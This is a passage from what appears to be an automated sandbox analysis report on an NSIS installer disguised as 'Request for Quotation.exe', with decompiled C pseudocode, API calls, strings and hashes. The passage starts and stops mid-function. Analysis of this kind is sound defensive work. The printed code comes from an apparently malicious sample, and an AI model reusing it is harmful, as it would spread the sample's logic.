								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}



























                                                                                0x00402eff
                                                                                0x00402f02
                                                                                0x00402f1c
                                                                                0x00402f21
                                                                                0x00402f34
                                                                                0x00402f39
                                                                                0x00402f3f
                                                                                0x00000000
                                                                                0x00402f41
                                                                                0x00402f52
                                                                                0x00402f63
                                                                                0x00402f6a
                                                                                0x00402f72
                                                                                0x00402f77
                                                                                0x00402f79
                                                                                0x00403067
                                                                                0x00403069
                                                                                0x00403075
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040307e
                                                                                0x004030aa
                                                                                0x004030b5
                                                                                0x004030be
                                                                                0x004030bf
                                                                                0x004030c4
                                                                                0x004030d5
                                                                                0x004030db
                                                                                0x004030e1
                                                                                0x004030e7
                                                                                0x004030f1
                                                                                0x0040310c
                                                                                0x00403115
                                                                                0x0040311a
                                                                                0x00403139
                                                                                0x00403149
                                                                                0x0040315b
                                                                                0x00403160
                                                                                0x00403168
                                                                                0x00403175
                                                                                0x0040317d
                                                                                0x00403182
                                                                                0x00403184
                                                                                0x00403184
                                                                                0x0040318a
                                                                                0x0040318a
                                                                                0x0040318d
                                                                                0x0040318f
                                                                                0x0040318f
                                                                                0x00403191
                                                                                0x00403193
                                                                                0x00403193
                                                                                0x0040319d
                                                                                0x004031a9
                                                                                0x00000000
                                                                                0x004031ae
                                                                                0x00000000
                                                                                0x00403168
                                                                                0x00000000
                                                                                0x0040311c
                                                                                0x00403086
                                                                                0x00403098
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402f7f
                                                                                0x00402f7f
                                                                                0x00402f84
                                                                                0x00402f88
                                                                                0x00402f8f
                                                                                0x00402f96
                                                                                0x00402f98
                                                                                0x00402f98
                                                                                0x00402fa7
                                                                                0x00403128
                                                                                0x0040316a
                                                                                0x00000000
                                                                                0x0040316a
                                                                                0x00402fb3
                                                                                0x00403037
                                                                                0x0040303a
                                                                                0x0040303f
                                                                                0x00000000
                                                                                0x00403037
                                                                                0x00402fc0
                                                                                0x00402fc5
                                                                                0x00402fcd
                                                                                0x00402ff3
                                                                                0x00403002
                                                                                0x00403008
                                                                                0x0040300d
                                                                                0x00403013
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040301d
                                                                                0x00403025
                                                                                0x00403028
                                                                                0x0040302d
                                                                                0x0040302f
                                                                                0x0040302f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040301d
                                                                                0x00403040
                                                                                0x00403046
                                                                                0x00403056
                                                                                0x00403056
                                                                                0x00403059
                                                                                0x0040305f
                                                                                0x0040305f
                                                                                0x00000000
                                                                                0x00402f7f

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402F05
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Request for Quotation.exe,00000400), ref: 00402F21
                                                                                  • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                  • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Request for Quotation.exe,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00402F6A
                                                                                • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF
                                                                                Strings
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00402EF1
                                                                                • Error launching installer, xrefs: 00402F41
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                                • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                                • Null, xrefs: 00402FEA
                                                                                • soft, xrefs: 00402FE1
                                                                                • Inst, xrefs: 00402FD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Request for Quotation.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-1168965781
                                                                                • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\jones\AppData\Local\Temp\nsc77A8.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\jones\AppData\Local\Temp\nsc77A8.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}
















                                                                                0x00401759
                                                                                0x00401760
                                                                                0x00401769
                                                                                0x0040176c
                                                                                0x0040176f
                                                                                0x00401774
                                                                                0x0040177c
                                                                                0x00401798
                                                                                0x0040177e
                                                                                0x0040177e
                                                                                0x0040177f
                                                                                0x0040177f
                                                                                0x0040179e
                                                                                0x004017a8
                                                                                0x004017a8
                                                                                0x004017ac
                                                                                0x004017af
                                                                                0x004017b4
                                                                                0x004017b6
                                                                                0x004017b8
                                                                                0x004017bd
                                                                                0x004017bd
                                                                                0x004017c8
                                                                                0x004017c8
                                                                                0x004017d9
                                                                                0x004017db
                                                                                0x004017db
                                                                                0x004017dc
                                                                                0x004017dc
                                                                                0x004017df
                                                                                0x004017e2
                                                                                0x004017e5
                                                                                0x004017e5
                                                                                0x004017ec
                                                                                0x004017fb
                                                                                0x00401800
                                                                                0x00401803
                                                                                0x00401806
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401808
                                                                                0x0040180b
                                                                                0x00401865
                                                                                0x0040186a
                                                                                0x004015b0
                                                                                0x004027bf
                                                                                0x004027bf
                                                                                0x00402a5a
                                                                                0x00402a5d
                                                                                0x00402a5d
                                                                                0x00000000
                                                                                0x0040180d
                                                                                0x00401813
                                                                                0x0040181e
                                                                                0x0040182b
                                                                                0x00401836
                                                                                0x0040184c
                                                                                0x0040184c
                                                                                0x0040184f
                                                                                0x00000000
                                                                                0x00401855
                                                                                0x00401855
                                                                                0x00401856
                                                                                0x00401873
                                                                                0x00402a63
                                                                                0x00402a63
                                                                                0x00402a63
                                                                                0x00401858
                                                                                0x00401858
                                                                                0x00401859
                                                                                0x00401492
                                                                                0x00402387
                                                                                0x00402387
                                                                                0x00402387
                                                                                0x00401856
                                                                                0x0040184f
                                                                                0x00402a65
                                                                                0x00402a69
                                                                                0x00402a69
                                                                                0x00401883
                                                                                0x00401888
                                                                                0x00401896
                                                                                0x0040189b
                                                                                0x004018a1
                                                                                0x004018a5
                                                                                0x004018a7
                                                                                0x004018af
                                                                                0x004018bb
                                                                                0x004018a9
                                                                                0x004018a9
                                                                                0x004018ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004018ad
                                                                                0x004018c4
                                                                                0x004018ca
                                                                                0x004018cc
                                                                                0x00000000
                                                                                0x004018d2
                                                                                0x004018d2
                                                                                0x004018d5
                                                                                0x004018ed
                                                                                0x004018d7
                                                                                0x004018da
                                                                                0x004018e3
                                                                                0x004018e3
                                                                                0x004018f2
                                                                                0x004018f7
                                                                                0x00402382
                                                                                0x00000000
                                                                                0x00402382
                                                                                0x00000000

                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                  • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll$Call
                                                                                • API String ID: 1941528284-3163409623
                                                                                • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE42B4, Relevance: 11.3, APIs: 4, Strings: 1, Instructions: 2572filememoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E6EEE42B4(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				short _v134;
				short _v136;
				short _v138;
				short _v140;
				short _v142;
				short _v144;
				short _v146;
				short _v148;
				short _v150;
				short _v152;
				short _v154;
				short _v156;
				short _v158;
				short _v160;
				short _v162;
				short _v164;
				short _v166;
				short _v168;
				short _v170;
				short _v172;
				short _v174;
				short _v176;
				short _v178;
				short _v180;
				short _v182;
				short _v184;
				short _v186;
				short _v188;
				short _v190;
				short _v192;
				short _v194;
				short _v196;
				short _v198;
				short _v200;
				short _v202;
				short _v204;
				short _v206;
				short _v208;
				short _v210;
				short _v212;
				short _v214;
				short _v216;
				short _v218;
				short _v220;
				short _v222;
				short _v224;
				short _v226;
				short _v228;
				short _v230;
				short _v232;
				short _v234;
				short _v236;
				short _v238;
				short _v240;
				short _v242;
				short _v244;
				short _v246;
				short _v248;
				short _v250;
				short _v252;
				short _v254;
				short _v256;
				short _v258;
				short _v260;
				short _v262;
				short _v264;
				short _v266;
				short _v268;
				short _v270;
				short _v272;
				short _v274;
				short _v276;
				short _v278;
				short _v280;
				short _v282;
				short _v284;
				short _v286;
				short _v288;
				short _v290;
				short _v292;
				short _v294;
				short _v296;
				short _v298;
				short _v300;
				short _v302;
				short _v304;
				short _v306;
				short _v308;
				short _v310;
				short _v312;
				short _v314;
				short _v316;
				short _v318;
				short _v320;
				short _v322;
				short _v324;
				short _v326;
				short _v328;
				short _v330;
				short _v332;
				short _v334;
				short _v336;
				short _v338;
				short _v340;
				short _v342;
				short _v344;
				short _v346;
				short _v348;
				short _v350;
				short _v352;
				short _v354;
				short _v356;
				short _v358;
				short _v360;
				short _v362;
				short _v364;
				short _v366;
				short _v368;
				short _v370;
				short _v372;
				short _v374;
				short _v376;
				short _v378;
				short _v380;
				short _v382;
				short _v384;
				short _v386;
				short _v388;
				short _v390;
				short _v392;
				short _v394;
				short _v396;
				short _v398;
				short _v400;
				short _v402;
				short _v404;
				short _v406;
				short _v408;
				short _v410;
				short _v412;
				short _v414;
				short _v416;
				short _v418;
				short _v420;
				short _v422;
				short _v424;
				short _v426;
				short _v428;
				short _v430;
				short _v432;
				short _v434;
				short _v436;
				short _v438;
				short _v440;
				short _v442;
				short _v444;
				short _v446;
				short _v448;
				short _v450;
				short _v452;
				short _v454;
				short _v456;
				short _v458;
				short _v460;
				short _v462;
				short _v464;
				short _v466;
				short _v468;
				short _v470;
				short _v472;
				short _v474;
				short _v476;
				short _v478;
				short _v480;
				short _v482;
				short _v484;
				short _v486;
				short _v488;
				short _v490;
				short _v492;
				short _v494;
				short _v496;
				short _v498;
				short _v500;
				short _v502;
				short _v504;
				short _v506;
				short _v508;
				short _v510;
				short _v512;
				short _v514;
				short _v516;
				short _v518;
				short _v520;
				short _v522;
				short _v524;
				short _v526;
				short _v528;
				short _v530;
				short _v532;
				short _v534;
				short _v536;
				short _v538;
				short _v540;
				short _v542;
				short _v544;
				short _v546;
				short _v548;
				short _v550;
				short _v552;
				short _v554;
				short _v556;
				short _v558;
				short _v560;
				short _v562;
				short _v564;
				short _v566;
				short _v568;
				short _v570;
				short _v572;
				short _v574;
				short _v576;
				short _v578;
				short _v580;
				short _v582;
				short _v584;
				short _v586;
				char _v588;
				short _v592;
				short _v594;
				short _v596;
				short _v598;
				short _v600;
				short _v602;
				short _v604;
				short _v606;
				short _v608;
				short _v610;
				short _v612;
				short _v614;
				short _v616;
				short _v618;
				short _v620;
				short _v622;
				short _v624;
				short _v626;
				short _v628;
				short _v630;
				short _v632;
				short _v634;
				short _v636;
				short _v638;
				short _v640;
				short _v642;
				short _v644;
				short _v646;
				short _v648;
				short _v650;
				short _v652;
				short _v654;
				short _v656;
				short _v658;
				short _v660;
				short _v662;
				short _v664;
				short _v666;
				short _v668;
				short _v670;
				short _v672;
				short _v674;
				short _v676;
				short _v678;
				short _v680;
				short _v682;
				short _v684;
				short _v686;
				short _v688;
				short _v690;
				short _v692;
				short _v694;
				short _v696;
				short _v698;
				short _v700;
				short _v702;
				short _v704;
				short _v706;
				short _v708;
				short _v710;
				short _v712;
				short _v714;
				short _v716;
				short _v718;
				short _v720;
				short _v722;
				short _v724;
				short _v726;
				short _v728;
				short _v730;
				short _v732;
				short _v734;
				short _v736;
				short _v738;
				short _v740;
				short _v742;
				short _v744;
				short _v746;
				short _v748;
				short _v750;
				short _v752;
				short _v754;
				short _v756;
				short _v758;
				short _v760;
				short _v762;
				short _v764;
				short _v766;
				short _v768;
				short _v770;
				short _v772;
				short _v774;
				short _v776;
				short _v778;
				short _v780;
				short _v782;
				short _v784;
				short _v786;
				short _v788;
				short _v790;
				short _v792;
				short _v794;
				short _v796;
				short _v798;
				short _v800;
				short _v802;
				short _v804;
				short _v806;
				short _v808;
				short _v810;
				short _v812;
				short _v814;
				short _v816;
				short _v818;
				short _v820;
				short _v822;
				short _v824;
				short _v826;
				short _v828;
				short _v830;
				short _v832;
				short _v834;
				short _v836;
				short _v838;
				short _v840;
				short _v842;
				short _v844;
				short _v846;
				short _v848;
				short _v850;
				short _v852;
				short _v854;
				short _v856;
				short _v858;
				short _v860;
				short _v862;
				short _v864;
				short _v866;
				short _v868;
				short _v870;
				short _v872;
				short _v874;
				short _v876;
				short _v878;
				short _v880;
				short _v882;
				short _v884;
				short _v886;
				short _v888;
				short _v890;
				short _v892;
				short _v894;
				short _v896;
				short _v898;
				short _v900;
				short _v902;
				short _v904;
				short _v906;
				short _v908;
				short _v910;
				short _v912;
				short _v914;
				short _v916;
				short _v918;
				short _v920;
				short _v922;
				short _v924;
				short _v926;
				short _v928;
				short _v930;
				short _v932;
				short _v934;
				short _v936;
				short _v938;
				short _v940;
				short _v942;
				short _v944;
				short _v946;
				short _v948;
				short _v950;
				short _v952;
				short _v954;
				short _v956;
				short _v958;
				short _v960;
				short _v962;
				short _v964;
				short _v966;
				short _v968;
				short _v970;
				short _v972;
				short _v974;
				short _v976;
				short _v978;
				short _v980;
				short _v982;
				short _v984;
				short _v986;
				short _v988;
				short _v990;
				short _v992;
				short _v994;
				short _v996;
				short _v998;
				short _v1000;
				short _v1002;
				short _v1004;
				short _v1006;
				short _v1008;
				short _v1010;
				short _v1012;
				short _v1014;
				short _v1016;
				short _v1018;
				short _v1020;
				short _v1022;
				short _v1024;
				short _v1026;
				short _v1028;
				short _v1030;
				short _v1032;
				short _v1034;
				short _v1036;
				short _v1038;
				short _v1040;
				short _v1042;
				short _v1044;
				short _v1046;
				short _v1048;
				short _v1050;
				short _v1052;
				short _v1054;
				short _v1056;
				short _v1058;
				short _v1060;
				short _v1062;
				short _v1064;
				short _v1066;
				short _v1068;
				short _v1070;
				short _v1072;
				short _v1074;
				short _v1076;
				short _v1078;
				short _v1080;
				short _v1082;
				short _v1084;
				short _v1086;
				short _v1088;
				short _v1090;
				short _v1092;
				short _v1094;
				short _v1096;
				short _v1098;
				short _v1100;
				short _v1102;
				short _v1104;
				short _v1106;
				short _v1108;
				short _v1110;
				char _v1112;
				short _v1116;
				short _v1118;
				short _v1120;
				short _v1122;
				short _v1124;
				short _v1126;
				short _v1128;
				short _v1130;
				short _v1132;
				short _v1134;
				short _v1136;
				short _v1138;
				short _v1140;
				short _v1142;
				short _v1144;
				short _v1146;
				short _v1148;
				short _v1150;
				short _v1152;
				short _v1154;
				short _v1156;
				short _v1158;
				short _v1160;
				short _v1162;
				short _v1164;
				short _v1166;
				short _v1168;
				short _v1170;
				short _v1172;
				short _v1174;
				short _v1176;
				short _v1178;
				short _v1180;
				short _v1182;
				short _v1184;
				short _v1186;
				short _v1188;
				short _v1190;
				short _v1192;
				short _v1194;
				short _v1196;
				short _v1198;
				short _v1200;
				short _v1202;
				short _v1204;
				short _v1206;
				short _v1208;
				short _v1210;
				short _v1212;
				short _v1214;
				short _v1216;
				short _v1218;
				short _v1220;
				short _v1222;
				short _v1224;
				short _v1226;
				short _v1228;
				short _v1230;
				short _v1232;
				short _v1234;
				short _v1236;
				short _v1238;
				short _v1240;
				short _v1242;
				short _v1244;
				short _v1246;
				short _v1248;
				short _v1250;
				short _v1252;
				short _v1254;
				short _v1256;
				short _v1258;
				short _v1260;
				short _v1262;
				short _v1264;
				short _v1266;
				short _v1268;
				short _v1270;
				short _v1272;
				short _v1274;
				short _v1276;
				short _v1278;
				short _v1280;
				short _v1282;
				short _v1284;
				short _v1286;
				short _v1288;
				short _v1290;
				short _v1292;
				short _v1294;
				short _v1296;
				short _v1298;
				short _v1300;
				short _v1302;
				short _v1304;
				short _v1306;
				short _v1308;
				short _v1310;
				short _v1312;
				short _v1314;
				short _v1316;
				short _v1318;
				short _v1320;
				short _v1322;
				short _v1324;
				short _v1326;
				short _v1328;
				short _v1330;
				short _v1332;
				short _v1334;
				short _v1336;
				short _v1338;
				short _v1340;
				short _v1342;
				short _v1344;
				short _v1346;
				short _v1348;
				short _v1350;
				short _v1352;
				short _v1354;
				short _v1356;
				short _v1358;
				short _v1360;
				short _v1362;
				short _v1364;
				short _v1366;
				short _v1368;
				short _v1370;
				short _v1372;
				short _v1374;
				short _v1376;
				short _v1378;
				short _v1380;
				short _v1382;
				short _v1384;
				short _v1386;
				short _v1388;
				short _v1390;
				short _v1392;
				short _v1394;
				short _v1396;
				short _v1398;
				short _v1400;
				short _v1402;
				short _v1404;
				short _v1406;
				short _v1408;
				short _v1410;
				short _v1412;
				short _v1414;
				short _v1416;
				short _v1418;
				short _v1420;
				short _v1422;
				short _v1424;
				short _v1426;
				short _v1428;
				short _v1430;
				short _v1432;
				short _v1434;
				short _v1436;
				short _v1438;
				short _v1440;
				short _v1442;
				short _v1444;
				short _v1446;
				short _v1448;
				short _v1450;
				short _v1452;
				short _v1454;
				short _v1456;
				short _v1458;
				short _v1460;
				short _v1462;
				short _v1464;
				short _v1466;
				short _v1468;
				short _v1470;
				short _v1472;
				short _v1474;
				short _v1476;
				short _v1478;
				short _v1480;
				short _v1482;
				short _v1484;
				short _v1486;
				short _v1488;
				short _v1490;
				short _v1492;
				short _v1494;
				short _v1496;
				short _v1498;
				short _v1500;
				short _v1502;
				short _v1504;
				short _v1506;
				short _v1508;
				short _v1510;
				short _v1512;
				short _v1514;
				short _v1516;
				short _v1518;
				short _v1520;
				short _v1522;
				short _v1524;
				short _v1526;
				short _v1528;
				short _v1530;
				short _v1532;
				short _v1534;
				short _v1536;
				short _v1538;
				short _v1540;
				short _v1542;
				short _v1544;
				short _v1546;
				short _v1548;
				short _v1550;
				short _v1552;
				short _v1554;
				short _v1556;
				short _v1558;
				short _v1560;
				short _v1562;
				short _v1564;
				short _v1566;
				short _v1568;
				short _v1570;
				short _v1572;
				short _v1574;
				short _v1576;
				short _v1578;
				short _v1580;
				short _v1582;
				short _v1584;
				short _v1586;
				short _v1588;
				short _v1590;
				short _v1592;
				short _v1594;
				short _v1596;
				short _v1598;
				short _v1600;
				short _v1602;
				short _v1604;
				short _v1606;
				short _v1608;
				short _v1610;
				short _v1612;
				short _v1614;
				short _v1616;
				short _v1618;
				short _v1620;
				short _v1622;
				short _v1624;
				short _v1626;
				short _v1628;
				short _v1630;
				short _v1632;
				short _v1634;
				short _v1636;
				short _v1638;
				short _v1640;
				short _v1642;
				char _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				long _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				signed int _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				char _v1720;
				char _v1788;
				char _v2828;
				short _t902;
				short _t903;
				short _t904;
				short _t905;
				short _t906;
				short _t907;
				short _t908;
				short _t909;
				short _t910;
				short _t911;
				short _t912;
				short _t913;
				short _t914;
				short _t915;
				short _t916;
				short _t917;
				short _t918;
				short _t919;
				short _t920;
				short _t921;
				short _t922;
				short _t923;
				short _t924;
				short _t925;
				short _t926;
				short _t927;
